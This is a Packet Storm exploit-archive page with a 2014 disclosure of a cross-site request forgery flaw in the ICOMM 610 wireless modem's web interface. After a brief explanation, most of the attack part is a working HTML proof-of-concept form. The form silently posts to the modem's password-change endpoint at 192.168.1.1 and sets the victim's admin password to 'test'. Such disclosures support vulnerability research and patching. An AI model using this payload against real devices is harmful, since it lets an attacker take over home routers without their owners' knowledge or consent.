exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ICOMM 610 Wireless Modem Cross Site Request Forgery

ICOMM 610 Wireless Modem Cross Site Request Forgery
Posted Apr 2, 2014
Authored by Blessen Thomas

ICOMM 610 wireless modem suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 21f6e63b81cb81511aa9c5520164732e3b61380d8954cd91b6668d2b521cf7ba

ICOMM 610 Wireless Modem Cross Site Request Forgery

Change Mirror Download
Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability

Google dork : N/A

Date : 02/04/2014

Exploit Author : Blessen Thomas

Vendor Homepage : http://www.icommtele.com/

Software Link : N/A

Version : ICOMM 610

Tested on : Device software version 01.01.08.991 (10/01/2010)

Type of Application : Modem Web Application

CVE : N/A

Cross Site Request Forgery

It was observed that this modem's Web Application , suffers from Cross-site

request forgery through which attacker can manipulate user data via sending
him malicious craft url.


At attacker could change the password of the victim's account without the
victim's knowledge as the

application is not having a security token implemented.


The Modem's application is not using any security token to prevent it
against CSRF. You can manipulate any userdata. PoC and Exploit to change
user password: In the POC the IP address in the POST is the modems IP
address.



<html>
<!-- CSRF PoC --->
<body>
<form action="http://192.168.1.1/cgi-bin/sysconf.cgi?page=personalize_password.asp&sid=rjPd8QVqvRGX×tamp=1396366701157" method="POST">
<input type="hidden" name="PasswdEnable" value="on" />
<input type="hidden" name="New_Passwd" value="test" />
<input type="hidden" name="Confirm_New_Passwd" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close